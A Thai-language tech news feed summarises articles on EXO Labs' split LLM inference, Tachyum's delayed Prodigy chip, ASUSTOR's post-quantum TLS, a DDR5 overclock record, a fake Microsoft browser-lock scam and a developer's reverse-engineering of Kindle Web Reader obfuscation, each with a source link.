    ⚡ “EXO Labs ผสาน DGX Spark กับ Mac Studio สร้างระบบ LLM ความเร็วทะลุ 2.8 เท่า” — ยุคใหม่ของ AI inference แบบแยกส่วนที่ใช้ฮาร์ดแวร์ทั่วไป EXO Labs ได้สาธิตระบบ AI inference แบบใหม่ที่ใช้แนวคิด “disaggregated inference” โดยผสานฮาร์ดแวร์ต่างชนิดเข้าด้วยกัน ได้แก่ 2 เครื่อง NVIDIA DGX Spark กับ Mac Studio ที่ใช้ชิป M3 Ultra ผ่านเครือข่าย 10-Gigabit Ethernet เพื่อแบ่งงานประมวลผลตามจุดแข็งของแต่ละเครื่อง ระบบนี้ใช้ซอฟต์แวร์ EXO ซึ่งเป็น open-source framework ที่ออกแบบมาเพื่อกระจายงาน inference ของ LLM ไปยังอุปกรณ์หลายชนิด เช่น desktop, server, laptop หรือแม้แต่สมาร์ตโฟน โดยไม่จำเป็นต้องใช้ GPU เดียวกัน หลักการทำงานคือแบ่งขั้นตอน inference ออกเป็น 2 ส่วน: ⚛️ Prefill stage: อ่านและประมวลผล prompt ซึ่งต้องใช้พลังประมวลผลสูง — ให้ DGX Spark ทำ ⚛️ Decode stage: สร้าง token ทีละตัว ซึ่งต้องใช้ bandwidth สูง — ให้ Mac Studio ทำ EXO stream ข้อมูลภายในของโมเดล (KV cache) แบบ layer-by-layer เพื่อให้ทั้งสองระบบทำงานพร้อมกันโดยไม่ต้องรอกัน ส่งผลให้ความเร็วรวมเพิ่มขึ้นถึง 2.8 เท่าเมื่อเทียบกับ Mac Studio เพียงเครื่องเดียว การทดสอบใช้โมเดล Llama 3.1 ขนาด 8B กับ prompt ยาว 8,000 token และพบว่าแม้จะเป็นโมเดลขนาดกลาง แต่การแบ่งงานแบบนี้ช่วยเพิ่มประสิทธิภาพได้อย่างชัดเจน ✅ ข้อมูลในข่าว ➡️ EXO Labs สาธิตระบบ AI inference แบบ disaggregated โดยใช้ DGX Spark กับ Mac Studio ➡️ ใช้เครือข่าย 10-Gigabit Ethernet เชื่อมต่อระหว่างเครื่อง ➡️ ซอฟต์แวร์ EXO เป็น open-source framework สำหรับกระจายงาน inference ➡️ ระบบแบ่งงานเป็น prefill (DGX Spark) และ decode (Mac Studio) ➡️ ใช้การ stream KV cache แบบ layer-by-layer เพื่อให้ทำงานพร้อมกัน ➡️ ความเร็วรวมเพิ่มขึ้น 2.8 เท่าเมื่อเทียบกับ Mac Studio เดี่ยว ➡️ ทดสอบกับโมเดล Llama 3.1 ขนาด 8B และ prompt ยาว 8K token ➡️ EXO 1.0 ยังอยู่ในช่วง early access และไม่ใช่ซอฟต์แวร์ plug-and-play ➡️ NVIDIA เตรียมใช้แนวคิดนี้ในแพลตฟอร์ม Rubin CPX ➡️ Dynamo framework ของ NVIDIA มีเป้าหมายคล้ายกันแต่ไม่มีระบบ subscription อัตโนมัติ https://www.tomshardware.com/software/two-nvidia-dgx-spark-systems-combined-with-m3-ultra-mac-studio-to-create-blistering-llm-system-exo-labs-demonstrates-disaggregated-ai-inference-and-achieves-a-2-8-benchmark-boost
    0 ความคิดเห็น 0 การแบ่งปัน 108 มุมมอง 0 รีวิว
  • “Tachyum Prodigy เลื่อนอีกครั้ง แต่เพิ่มเป็น 256 คอร์ต่อชิปเล็ต” — พร้อมดีล 500 ล้านดอลลาร์จากนักลงทุนยุโรป

    Tachyum ประกาศอัปเดตล่าสุดเกี่ยวกับชิป Prodigy ที่ตั้งเป้าเป็นโปรเซสเซอร์อเนกประสงค์สำหรับงาน AI และ HPC โดยเพิ่มจำนวนคอร์ต่อชิปเล็ตจากเดิม 192 เป็น 256 คอร์ เพื่อผลักดันประสิทธิภาพให้สูงขึ้นถึง 3 เท่าของซีพียู x86 ชั้นนำ และ 6 เท่าของ GPGPU สำหรับงาน HPC

    แม้จะมีความคืบหน้าเรื่องสเปก แต่ Prodigy ยังไม่เข้าสู่ขั้นตอน tape-out และยังไม่มีการล็อกสเปกสุดท้าย ทำให้การผลิตเชิงพาณิชย์น่าจะเริ่มได้ในปี 2027 ซึ่งถือว่าล่าช้ากว่ากำหนดเดิมหลายปี

    Tachyum ได้รับเงินลงทุน Series C จำนวน 220 ล้านดอลลาร์จากนักลงทุนยุโรป และยังได้รับคำสั่งซื้อ Prodigy มูลค่า 500 ล้านดอลลาร์จากนักลงทุนรายเดียวกัน โดยเงินทุนนี้จะใช้ในการเร่งขั้นตอน tape-out และการออกแบบขั้นสุดท้าย

    บริษัทคาดว่าจะได้ซิลิคอนตัวแรกในช่วงต้นปี 2026 และหากทุกอย่างเป็นไปตามแผน จะเริ่มส่งมอบเชิงพาณิชย์ได้ในกลางปี 2027 ซึ่งอาจสอดคล้องกับแผนการ IPO ของ Tachyum

    ข้อมูลในข่าว
    Tachyum เพิ่มจำนวนคอร์ใน Prodigy เป็น 256 คอร์ต่อชิปเล็ต
    เป้าหมายคือประสิทธิภาพสูงกว่า x86 และ GPGPU ชั้นนำ
    ยังไม่เข้าสู่ขั้นตอน tape-out และยังไม่ล็อกสเปกสุดท้าย
    ได้รับเงินลงทุน Series C จำนวน 220 ล้านดอลลาร์
    ได้รับคำสั่งซื้อ Prodigy มูลค่า 500 ล้านดอลลาร์จากนักลงทุนยุโรป
    คาดว่าจะได้ซิลิคอนตัวแรกในต้นปี 2026
    การส่งมอบเชิงพาณิชย์น่าจะเริ่มกลางปี 2027
    อาจสอดคล้องกับแผนการ IPO ของบริษัท
    ใช้เทคโนโลยีการผลิตระดับ 5nm-class จาก TSMC
    การพัฒนา Prodigy ใช้เวลานานกว่า 10 ปี

    คำเตือนจากข้อมูลข่าว
    Prodigy ยังไม่เข้าสู่ tape-out ทำให้ประสิทธิภาพจริงยังไม่สามารถวัดได้
    การเปลี่ยนแปลงสเปกระหว่างการพัฒนาอาจทำให้ timeline ล่าช้า
    การพึ่งพา TSMC อาจมีความเสี่ยงด้าน supply chain
    การพัฒนา 10 ปีอาจทำให้เทคโนโลยีบางส่วนล้าสมัยเมื่อเปิดตัว
    หาก validation ล่าช้า การส่งมอบอาจเลื่อนออกไปอีก
    การตั้งเป้าประสิทธิภาพสูงเกินไปอาจไม่สอดคล้องกับความเป็นจริงเมื่อผลิตจริง

    https://www.tomshardware.com/pc-components/cpus/tachyums-general-purpose-prodigy-chip-delayed-again-now-with-256-cores-per-chiplet-and-a-usd500-million-purchase-order-from-eu-investor
    🧠 “Tachyum Prodigy เลื่อนอีกครั้ง แต่เพิ่มเป็น 256 คอร์ต่อชิปเล็ต” — พร้อมดีล 500 ล้านดอลลาร์จากนักลงทุนยุโรป Tachyum ประกาศอัปเดตล่าสุดเกี่ยวกับชิป Prodigy ที่ตั้งเป้าเป็นโปรเซสเซอร์อเนกประสงค์สำหรับงาน AI และ HPC โดยเพิ่มจำนวนคอร์ต่อชิปเล็ตจากเดิม 192 เป็น 256 คอร์ เพื่อผลักดันประสิทธิภาพให้สูงขึ้นถึง 3 เท่าของซีพียู x86 ชั้นนำ และ 6 เท่าของ GPGPU สำหรับงาน HPC แม้จะมีความคืบหน้าเรื่องสเปก แต่ Prodigy ยังไม่เข้าสู่ขั้นตอน tape-out และยังไม่มีการล็อกสเปกสุดท้าย ทำให้การผลิตเชิงพาณิชย์น่าจะเริ่มได้ในปี 2027 ซึ่งถือว่าล่าช้ากว่ากำหนดเดิมหลายปี Tachyum ได้รับเงินลงทุน Series C จำนวน 220 ล้านดอลลาร์จากนักลงทุนยุโรป และยังได้รับคำสั่งซื้อ Prodigy มูลค่า 500 ล้านดอลลาร์จากนักลงทุนรายเดียวกัน โดยเงินทุนนี้จะใช้ในการเร่งขั้นตอน tape-out และการออกแบบขั้นสุดท้าย บริษัทคาดว่าจะได้ซิลิคอนตัวแรกในช่วงต้นปี 2026 และหากทุกอย่างเป็นไปตามแผน จะเริ่มส่งมอบเชิงพาณิชย์ได้ในกลางปี 2027 ซึ่งอาจสอดคล้องกับแผนการ IPO ของ Tachyum ✅ ข้อมูลในข่าว ➡️ Tachyum เพิ่มจำนวนคอร์ใน Prodigy เป็น 256 คอร์ต่อชิปเล็ต ➡️ เป้าหมายคือประสิทธิภาพสูงกว่า x86 และ GPGPU ชั้นนำ ➡️ ยังไม่เข้าสู่ขั้นตอน tape-out และยังไม่ล็อกสเปกสุดท้าย ➡️ ได้รับเงินลงทุน Series C จำนวน 220 ล้านดอลลาร์ ➡️ ได้รับคำสั่งซื้อ Prodigy มูลค่า 500 ล้านดอลลาร์จากนักลงทุนยุโรป ➡️ คาดว่าจะได้ซิลิคอนตัวแรกในต้นปี 2026 ➡️ การส่งมอบเชิงพาณิชย์น่าจะเริ่มกลางปี 2027 ➡️ อาจสอดคล้องกับแผนการ IPO ของบริษัท ➡️ ใช้เทคโนโลยีการผลิตระดับ 5nm-class จาก TSMC ➡️ การพัฒนา Prodigy ใช้เวลานานกว่า 10 ปี ‼️ คำเตือนจากข้อมูลข่าว ⛔ Prodigy ยังไม่เข้าสู่ tape-out ทำให้ประสิทธิภาพจริงยังไม่สามารถวัดได้ ⛔ การเปลี่ยนแปลงสเปกระหว่างการพัฒนาอาจทำให้ timeline ล่าช้า ⛔ การพึ่งพา TSMC อาจมีความเสี่ยงด้าน supply chain ⛔ การพัฒนา 10 ปีอาจทำให้เทคโนโลยีบางส่วนล้าสมัยเมื่อเปิดตัว ⛔ หาก validation ล่าช้า การส่งมอบอาจเลื่อนออกไปอีก ⛔ การตั้งเป้าประสิทธิภาพสูงเกินไปอาจไม่สอดคล้องกับความเป็นจริงเมื่อผลิตจริง https://www.tomshardware.com/pc-components/cpus/tachyums-general-purpose-prodigy-chip-delayed-again-now-with-256-cores-per-chiplet-and-a-usd500-million-purchase-order-from-eu-investor
    0 ความคิดเห็น 0 การแบ่งปัน 105 มุมมอง 0 รีวิว
  • “ASUSTOR NAS พร้อมรับมือยุคควอนตัม” — อัปเกรดระบบเข้ารหัสด้วยเทคโนโลยี Post-Quantum Cryptography

    ASUSTOR ประกาศว่า NAS OS รุ่นล่าสุด ADM 5.1 ได้รับการอัปเกรดให้รองรับเทคโนโลยี Post-Quantum Cryptography (PQC) อย่างเต็มรูปแบบ โดยใช้มาตรฐานที่ได้รับการรับรองจาก NIST สหรัฐฯ เพื่อเตรียมพร้อมรับมือกับภัยคุกคามจากการถอดรหัสด้วยคอมพิวเตอร์ควอนตัมในอนาคต

    ระบบใหม่ใช้ Hybrid TLS ที่ผสานการเข้ารหัสแบบ X25519 กับ ML-KEM 768 (Kyber) เพื่อป้องกันข้อมูลทั้งในปัจจุบันและอนาคต โดยผู้ใช้ไม่ต้องตั้งค่าใด ๆ เพิ่มเติม หากใช้เบราว์เซอร์ที่รองรับ TLS 1.3 และ PQC ระบบจะเชื่อมต่อแบบเข้ารหัสควอนตัมโดยอัตโนมัติ

    การอัปเกรดนี้มีเป้าหมายเพื่อป้องกันการโจมตีแบบ “Harvest Now, Decrypt Later” ซึ่งเป็นการดักจับข้อมูลเข้ารหัสไว้ก่อน แล้วรอให้เทคโนโลยีถอดรหัสพัฒนาจนสามารถเจาะข้อมูลได้ในอนาคต เช่น ข้อมูลสำรองระยะยาว, เอกสารลับ, ทรัพย์สินทางปัญญา, ข้อมูลการแพทย์และการเงิน

    ADM 5.1 จะแสดงสถานะการเข้ารหัสให้ผู้ใช้เห็นอย่างชัดเจน และจะเปิดใช้งาน PQC โดยอัตโนมัติเมื่อเบราว์เซอร์รองรับ โดยเบราว์เซอร์ที่รองรับ ได้แก่ Chrome 131, Edge 131, Firefox 135, Opera 116 และ Brave 1.73

    ข้อมูลในข่าว
    ASUSTOR อัปเกรด NAS OS ADM 5.1 ให้รองรับ Post-Quantum Cryptography (PQC)
    ใช้มาตรฐานจาก NIST สหรัฐฯ เช่น ML-KEM 768 (Kyber)
    ใช้ Hybrid TLS ที่ผสาน X25519 กับ Kyber เพื่อความปลอดภัยสองชั้น
    ป้องกันการโจมตีแบบ “Harvest Now, Decrypt Later”
    ผู้ใช้ไม่ต้องตั้งค่าเพิ่มเติม หากเบราว์เซอร์รองรับ TLS 1.3 และ PQC
    ระบบจะเชื่อมต่อแบบเข้ารหัสควอนตัมโดยอัตโนมัติ
    ADM จะแสดงสถานะการเข้ารหัสให้ผู้ใช้เห็น
    เบราว์เซอร์ที่รองรับ ได้แก่ Chrome 131, Edge 131, Firefox 135, Opera 116 และ Brave 1.73
    เหมาะกับการปกป้องข้อมูลระยะยาว เช่น เอกสารลับและข้อมูลสำรอง

    https://www.techpowerup.com/341960/asustor-nas-devices-now-pqc-ready
    🔐 “ASUSTOR NAS พร้อมรับมือยุคควอนตัม” — อัปเกรดระบบเข้ารหัสด้วยเทคโนโลยี Post-Quantum Cryptography ASUSTOR ประกาศว่า NAS OS รุ่นล่าสุด ADM 5.1 ได้รับการอัปเกรดให้รองรับเทคโนโลยี Post-Quantum Cryptography (PQC) อย่างเต็มรูปแบบ โดยใช้มาตรฐานที่ได้รับการรับรองจาก NIST สหรัฐฯ เพื่อเตรียมพร้อมรับมือกับภัยคุกคามจากการถอดรหัสด้วยคอมพิวเตอร์ควอนตัมในอนาคต ระบบใหม่ใช้ Hybrid TLS ที่ผสานการเข้ารหัสแบบ X25519 กับ ML-KEM 768 (Kyber) เพื่อป้องกันข้อมูลทั้งในปัจจุบันและอนาคต โดยผู้ใช้ไม่ต้องตั้งค่าใด ๆ เพิ่มเติม หากใช้เบราว์เซอร์ที่รองรับ TLS 1.3 และ PQC ระบบจะเชื่อมต่อแบบเข้ารหัสควอนตัมโดยอัตโนมัติ การอัปเกรดนี้มีเป้าหมายเพื่อป้องกันการโจมตีแบบ “Harvest Now, Decrypt Later” ซึ่งเป็นการดักจับข้อมูลเข้ารหัสไว้ก่อน แล้วรอให้เทคโนโลยีถอดรหัสพัฒนาจนสามารถเจาะข้อมูลได้ในอนาคต เช่น ข้อมูลสำรองระยะยาว, เอกสารลับ, ทรัพย์สินทางปัญญา, ข้อมูลการแพทย์และการเงิน ADM 5.1 จะแสดงสถานะการเข้ารหัสให้ผู้ใช้เห็นอย่างชัดเจน และจะเปิดใช้งาน PQC โดยอัตโนมัติเมื่อเบราว์เซอร์รองรับ โดยเบราว์เซอร์ที่รองรับ ได้แก่ Chrome 131, Edge 131, Firefox 135, Opera 116 และ Brave 1.73 ✅ ข้อมูลในข่าว ➡️ ASUSTOR อัปเกรด NAS OS ADM 5.1 ให้รองรับ Post-Quantum Cryptography (PQC) ➡️ ใช้มาตรฐานจาก NIST สหรัฐฯ เช่น ML-KEM 768 (Kyber) ➡️ ใช้ Hybrid TLS ที่ผสาน X25519 กับ Kyber เพื่อความปลอดภัยสองชั้น ➡️ ป้องกันการโจมตีแบบ “Harvest Now, Decrypt Later” ➡️ ผู้ใช้ไม่ต้องตั้งค่าเพิ่มเติม หากเบราว์เซอร์รองรับ TLS 1.3 และ PQC ➡️ ระบบจะเชื่อมต่อแบบเข้ารหัสควอนตัมโดยอัตโนมัติ ➡️ ADM จะแสดงสถานะการเข้ารหัสให้ผู้ใช้เห็น ➡️ เบราว์เซอร์ที่รองรับ ได้แก่ Chrome 131, Edge 131, Firefox 135, Opera 116 และ Brave 1.73 ➡️ เหมาะกับการปกป้องข้อมูลระยะยาว เช่น เอกสารลับและข้อมูลสำรอง https://www.techpowerup.com/341960/asustor-nas-devices-now-pqc-ready
    WWW.TECHPOWERUP.COM
    ASUSTOR NAS Devices Now PQC Ready
    Facing the arrival of the quantum computing era and the potential risks to traditional encryption algorithms, ASUSTOR Inc. has announced that its NAS operating system, ADM 5.1, will fully adopt post-quantum cryptography (PQC) technology approved by the US National Institute of Standards and Technolo...
    0 ความคิดเห็น 0 การแบ่งปัน 101 มุมมอง 0 รีวิว
  • “DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก

    ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน

    ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z

    แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด

    ข้อมูลในข่าว
    DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก
    นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE
    ซีพียูที่ใช้คือ Intel Core Ultra 9 285K
    ใช้ไนโตรเจนเหลวในการระบายความร้อน
    ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz)
    ได้รับการยืนยันจาก HWBot และ CPU-Z
    ค่า latency อยู่ที่ CL68-127-127-127-2
    IMC to Memory Clock ratio อยู่ที่ 3:190
    ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ
    เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง
    Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ

    https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/
    🚀 “DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด ✅ ข้อมูลในข่าว ➡️ DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก ➡️ นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE ➡️ ซีพียูที่ใช้คือ Intel Core Ultra 9 285K ➡️ ใช้ไนโตรเจนเหลวในการระบายความร้อน ➡️ ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz) ➡️ ได้รับการยืนยันจาก HWBot และ CPU-Z ➡️ ค่า latency อยู่ที่ CL68-127-127-127-2 ➡️ IMC to Memory Clock ratio อยู่ที่ 3:190 ➡️ ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ ➡️ เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง ➡️ Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/
    WCCFTECH.COM
    It's Official: DDR5 Speed Pushed Over 13000 MT/s For The First Time With Corsair Vengeance Memory
    For the first time ever, an overclocker has broke the 13010 MT/s barrier on DDR5 memory, making a new world record.
    0 ความคิดเห็น 0 การแบ่งปัน 82 มุมมอง 0 รีวิว
  • “หลอกลวงใหม่ใช้โลโก้ Microsoft ล็อกเบราว์เซอร์เพื่อขโมยข้อมูล” — เทคนิคใหม่ของ scammer ที่สร้างสถานการณ์ปลอมให้ผู้ใช้ตื่นตระหนก

    รายงานจาก Cofense Phishing Defense Centre เผยการโจมตีแบบใหม่ที่ใช้แบรนด์ Microsoft เพื่อหลอกลวงผู้ใช้ให้โทรหาเบอร์สนับสนุนปลอม โดยเริ่มจากอีเมลที่เสนอ “เงินคืน” จากบริษัทปลอม เช่น Syria Rent a Car เพื่อดึงดูดให้ผู้ใช้คลิกลิงก์

    เมื่อคลิกแล้ว ผู้ใช้จะถูกนำไปยัง CAPTCHA ปลอมเพื่อสร้างความน่าเชื่อถือและหลบเลี่ยงระบบตรวจจับอัตโนมัติ หลังจากผ่าน CAPTCHA จะเข้าสู่หน้าเว็บที่แสดง popup ปลอมว่าเครื่องติดไวรัส พร้อมข้อความเตือนจาก “Microsoft” และเบอร์โทรปลอม

    เบราว์เซอร์จะถูกทำให้ดูเหมือน “ล็อก” โดยผู้ใช้ไม่สามารถควบคุมเมาส์ได้ สร้างความตื่นตระหนกและทำให้ผู้ใช้โทรหาเบอร์ที่แสดง ซึ่งจะเชื่อมต่อกับ “ช่างเทคนิคปลอม” ที่พยายามขโมยข้อมูลบัญชี หรือให้ติดตั้งโปรแกรมควบคุมระยะไกลเพื่อเข้าถึงเครื่อง

    ผู้เชี่ยวชาญเตือนว่าเบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์ได้

    ข้อมูลในข่าว
    การโจมตีเริ่มจากอีเมลหลอกลวงที่เสนอเงินคืนจากบริษัทปลอม
    ลิงก์ในอีเมลนำไปสู่ CAPTCHA ปลอมเพื่อหลบเลี่ยงระบบตรวจจับ
    หน้าเว็บสุดท้ายแสดง popup ปลอมว่าเครื่องติดไวรัส
    ใช้โลโก้ Microsoft และข้อความปลอมเพื่อสร้างความน่าเชื่อถือ
    เบราว์เซอร์ถูกทำให้ดูเหมือนล็อก และเมาส์ไม่ตอบสนอง
    ผู้ใช้ถูกหลอกให้โทรหาเบอร์ปลอมที่แสดงบนหน้าจอ
    “ช่างเทคนิคปลอม” พยายามขโมยข้อมูลหรือให้ติดตั้งโปรแกรมควบคุมระยะไกล
    เบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์
    เป้าหมายของการโจมตีคือการขโมยข้อมูลและเข้าถึงระบบของผู้ใช้
    Cofense เตือนว่าเป็นการใช้ความไว้วางใจในแบรนด์เพื่อหลอกลวง

    https://hackread.com/tech-support-scam-microsoft-logo-browser-lock-data/
    🔒 “หลอกลวงใหม่ใช้โลโก้ Microsoft ล็อกเบราว์เซอร์เพื่อขโมยข้อมูล” — เทคนิคใหม่ของ scammer ที่สร้างสถานการณ์ปลอมให้ผู้ใช้ตื่นตระหนก รายงานจาก Cofense Phishing Defense Centre เผยการโจมตีแบบใหม่ที่ใช้แบรนด์ Microsoft เพื่อหลอกลวงผู้ใช้ให้โทรหาเบอร์สนับสนุนปลอม โดยเริ่มจากอีเมลที่เสนอ “เงินคืน” จากบริษัทปลอม เช่น Syria Rent a Car เพื่อดึงดูดให้ผู้ใช้คลิกลิงก์ เมื่อคลิกแล้ว ผู้ใช้จะถูกนำไปยัง CAPTCHA ปลอมเพื่อสร้างความน่าเชื่อถือและหลบเลี่ยงระบบตรวจจับอัตโนมัติ หลังจากผ่าน CAPTCHA จะเข้าสู่หน้าเว็บที่แสดง popup ปลอมว่าเครื่องติดไวรัส พร้อมข้อความเตือนจาก “Microsoft” และเบอร์โทรปลอม เบราว์เซอร์จะถูกทำให้ดูเหมือน “ล็อก” โดยผู้ใช้ไม่สามารถควบคุมเมาส์ได้ สร้างความตื่นตระหนกและทำให้ผู้ใช้โทรหาเบอร์ที่แสดง ซึ่งจะเชื่อมต่อกับ “ช่างเทคนิคปลอม” ที่พยายามขโมยข้อมูลบัญชี หรือให้ติดตั้งโปรแกรมควบคุมระยะไกลเพื่อเข้าถึงเครื่อง ผู้เชี่ยวชาญเตือนว่าเบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์ได้ ✅ ข้อมูลในข่าว ➡️ การโจมตีเริ่มจากอีเมลหลอกลวงที่เสนอเงินคืนจากบริษัทปลอม ➡️ ลิงก์ในอีเมลนำไปสู่ CAPTCHA ปลอมเพื่อหลบเลี่ยงระบบตรวจจับ ➡️ หน้าเว็บสุดท้ายแสดง popup ปลอมว่าเครื่องติดไวรัส ➡️ ใช้โลโก้ Microsoft และข้อความปลอมเพื่อสร้างความน่าเชื่อถือ ➡️ เบราว์เซอร์ถูกทำให้ดูเหมือนล็อก และเมาส์ไม่ตอบสนอง ➡️ ผู้ใช้ถูกหลอกให้โทรหาเบอร์ปลอมที่แสดงบนหน้าจอ ➡️ “ช่างเทคนิคปลอม” พยายามขโมยข้อมูลหรือให้ติดตั้งโปรแกรมควบคุมระยะไกล ➡️ เบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์ ➡️ เป้าหมายของการโจมตีคือการขโมยข้อมูลและเข้าถึงระบบของผู้ใช้ ➡️ Cofense เตือนว่าเป็นการใช้ความไว้วางใจในแบรนด์เพื่อหลอกลวง https://hackread.com/tech-support-scam-microsoft-logo-browser-lock-data/
    HACKREAD.COM
    New Tech Support Scam Uses Microsoft Logo to Fake Browser Lock, Steal Data
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 74 มุมมอง 0 รีวิว
  • “เมื่อ Kindle ไม่ให้ดาวน์โหลดหนังสือที่ซื้อ — นักพัฒนาแฮกระบบเว็บเพื่ออ่านในแอปที่ตัวเองเลือก”

    Pixelmelt นักพัฒนาสายแฮกเกอร์สายเทคนิค ได้เขียนบล็อกเล่าประสบการณ์สุดหัวร้อนหลังซื้อ eBook จาก Amazon แล้วพบว่าไม่สามารถอ่านผ่านแอปอื่นได้เลย Kindle Android app ก็ดันแครชซ้ำ ๆ ส่วน Kindle Web Reader ก็ไม่ให้ดาวน์โหลดไฟล์หรือ export ไปยัง Calibre ซึ่งเป็นแอปจัดการหนังสือยอดนิยมของสาย eBook

    เขาจึงตัดสินใจ “reverse-engineer” ระบบ obfuscation ของ Kindle Web Reader เพื่อดึงข้อมูลหนังสือออกมาอ่านในแอปที่ตัวเองเลือก โดยพบว่า Amazon ใช้เทคนิคซับซ้อนหลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหาจริง เช่น:
    การแปลงตัวอักษรเป็น glyph ID แบบสุ่ม
    การเปลี่ยน mapping ทุก 5 หน้า
    การฝัง path SVG ที่ทำให้ parser ภายนอกอ่านผิด
    การใช้หลาย font variant และ ligature
    การจำกัด API ให้โหลดได้ทีละ 5 หน้าเท่านั้น

    Pixelmelt ลองใช้ OCR แต่ล้มเหลว จึงหันมาใช้เทคนิค “pixel-perfect matching” โดยเรนเดอร์ glyph เป็นภาพ แล้วใช้ perceptual hash และ SSIM เพื่อจับคู่กับตัวอักษรจากฟอนต์ Bookerly ที่ Amazon ใช้

    ผลลัพธ์คือ เขาสามารถถอดรหัส glyph ทั้งหมด 361 แบบจากหนังสือ 920 หน้า และสร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับแทบทุกประการ

    เขาย้ำว่าเป้าหมายไม่ใช่การละเมิดลิขสิทธิ์ แต่เพื่ออ่านหนังสือที่ “ซื้อมาแล้ว” ในแอปที่ตัวเองเลือก และเพื่อเรียนรู้เทคนิคด้าน SVG, hashing และ font metrics

    ข้อมูลในข่าว
    นักพัฒนาไม่สามารถอ่าน eBook ที่ซื้อจาก Amazon ในแอปอื่นได้
    Kindle Android app แครช และ Web Reader ไม่ให้ดาวน์โหลดหรือ export
    Amazon ใช้ระบบ obfuscation หลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหา
    ตัวอักษรถูกแปลงเป็น glyph ID แบบสุ่ม และเปลี่ยนทุก 5 หน้า
    API จำกัดให้โหลดได้ทีละ 5 หน้า
    glyphs ถูกฝังด้วย path SVG ที่ทำให้ parser อ่านผิด
    ใช้หลาย font variant เช่น bold, italic, ligature
    OCR ล้มเหลวในการจับคู่ glyph กับตัวอักษร
    ใช้ perceptual hash และ SSIM เพื่อจับคู่ glyph กับฟอนต์ Bookerly
    ถอดรหัส glyph ได้ครบ 361 แบบจากหนังสือ 920 หน้า
    สร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับ
    ย้ำว่าเป้าหมายคือการอ่านหนังสือที่ซื้อมาแล้ว ไม่ใช่ละเมิดลิขสิทธิ์
    ได้เรียนรู้เทคนิคด้าน SVG rendering, hashing และ font metrics

    https://blog.pixelmelt.dev/kindle-web-drm/
